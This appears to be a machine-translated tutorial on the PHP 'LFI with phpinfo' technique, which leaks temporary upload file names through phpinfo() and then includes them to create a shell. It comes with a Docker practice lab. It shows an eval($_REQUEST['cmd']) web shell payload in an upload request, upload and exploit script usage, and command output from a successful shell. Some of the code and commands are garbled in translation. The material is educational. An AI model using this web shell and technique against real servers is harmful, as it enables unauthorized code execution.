About 0x00
PHP local file contains knowledge of the vulnerability, dark clouds early on the corresponding article, Lfi with Phpinfo first by foreign Daniel, can refer to the following two articles. The use of the principle is to use the PHP post upload file to generate temporary files, phpinfo () read the temporary file path and name, the local containing the vulnerability generated 1 words back door.
This method is successful in local testing, in order to facilitate learning, reduce learning costs, has built Docker environment, easy to test. Put the built Docker on a foreign VPS and use the scripts under the POC folder in the GitHub project Lfi_phpinfo to run locally and still be getshell. This approach is feasible, and the network requirements are not very high.
Docker Hub Mirror Address: Janes/lfi_phpinfo
GitHub Project Address: Lfi_phpinfo
Source code directory, you can use the Docker reproduction, the POC directory to store the use of scripts
Paper
Http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf
Http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
0x01 PHP Upload
When uploading a file to any PHP file on the server, a temporary file will be generated and the path and name of the temporary file can be found directly on the Phpinfo page.
PHP post way to upload arbitrary files, the server will create temporary files to save the contents of the file.
In order to facilitate file transfer in the HTTP protocol, a form-based HTML file transfer method is provided.
To ensure that the properties of the upload form are enctype= "multipart/form-data, you must use post see: PHP File-upload.post-method
The PHP engine handles the enctype= "Multipart/form-data" request as follows:
The PHP engine first saves the contents of the file to a temporary file and then makes the appropriate action. The name of the temporary file is php+ random character.
In PHP, there is a hyper global variable $_files, which holds information about the uploaded file, including file name, type, temporary file name, error code, size
0x02 Manual Test Phpinfo () Get temporary file path
File upload.html
#!html
Browser access upload.html, upload files file.txt
#!php
Burp View post information as follows
#!bashpost/lfi_phpinfo/phpinfo.php http/1.1host: 127.0.0.1user-agent:mozilla/5.0 (X11; Linux x86_64; rv:44.0) gecko/20100101 firefox/44.0accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q= 0.8accept-language:en-us,en;q=0.5accept-encoding:gzip, deflatereferer:http://127.0.0.1/lfi_phpinfo/ Upload.htmlconnection:closecontent-type:multipart/form-data; boundary=---------------------------11008921013555437861019615112content-length:368--------------------------- --11008921013555437861019615112content-disposition:form-data; Name= "File"; Filename= "file.txt" Content-type:text/plain!--? phpeval ($_request["cmd"]),?-->----------------------------- 11008921013555437861019615112content-disposition:form-data; Name= "Submit" Submit-----------------------------11008921013555437861019615112--
Browser access, PHPINFO returns the following information:
#!php_request["Submit"] submit_post["Submit"] submit_files["file" Array ( [Name] = File.txt [Type] = Text/plain [Tmp_name] =/tmp/phpufdchh [ERROR] = 0 [Size] = + )
Get Tmp_name Path
0x03 python script upload file
#!pythonimport requestshost = ' 127.0.0.1 ' url = ' http://{ip}/lfi_phpinfo/phpinfo.php '. Format (ip=host) File_ = '/var/www /lfi_phpinfo/file.txt ' response = requests.post (URL, files={"name": Open (File_, ' RB ')}) print (Response.text)Partial return result
#!php_files["Name"]Array ( [name] = File.txt [Type] = [Tmp_name] =/tmp/php7evbv3 [ERROR] = 0 [ Size] = 33)
0X04 Local Build environment
Get shell
#!bash$ python lfi_phpinfo.py 127.0.0.1LFI with phpinfo () ==============================info:__main__:getting Initial Offset ... info:__main__:found [tmp_name] at 67801info:__main__:got it! Shell created in/tmp/ginfo:__main__:wowo! \m/info:__main__:shutting down ...
Firefox access
#!bashhttp://127.0.0.1/lfi_phpinfo/lfi.php?load=/tmp/gc&f=iduid=33 (Www-data) gid=33 (www-data) groups=33 ( Www-data)
Explain the success of Getshell, then you can freely play ~ ~
0x05 using Docker to build your environment
The basic use of Docker, here is not elaborated, can be self-Google. Here are two ways to build a mirrored source, build it yourself using GitHub lfi_phpinfo dockerfile, or use the image I've built Janes/lfi_phpinfo
--[PHP 1 = "Official source" 2= "2=" 2= "2=" 2= "language=": 5.6-apache "" "" "\"][/php]/php 5
Or
--Janes/lfi_phpinfo
Get the GitHub lfi_phpinfo source code, switch to the Web directory, and start building the environment for testing. This provides three ways to run
Mode 1 run the test using PHP official source
#!bashdocker run--rm-v code/:/var/www/html-p 80:80 Php:5.6-apache
Mode 2 run the test using the built-in image Janes/lfi_phpinfo
#!bashdocker Pull "Janes/lfi_phpinfo" Docker run--rm-p "80:80" Janes/lfi_phpinfo
Mode 3 using Docker-compose
#!bash docker-compose up
You can then use the Python script to Getshell the
#!bashpython lfi_phpinfo.py Docker_host_ip
0x06 concluding remarks
Hands-on practice LFI with phpinfo use of the process, in fact, it is not as smooth as the passage of the article, the period of more or less encounter some environment-related problems, and solve these problems will be spent energy, this is the birth of me with Docker to build the test environment of the idea of the source, Hope to give cyber-security enthusiasts to provide a more convenient learning environment. Finally thanks to the author of the [LFI with phpinfo Local test process] article, I studied LFI with Phpinfo for a lot of help.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
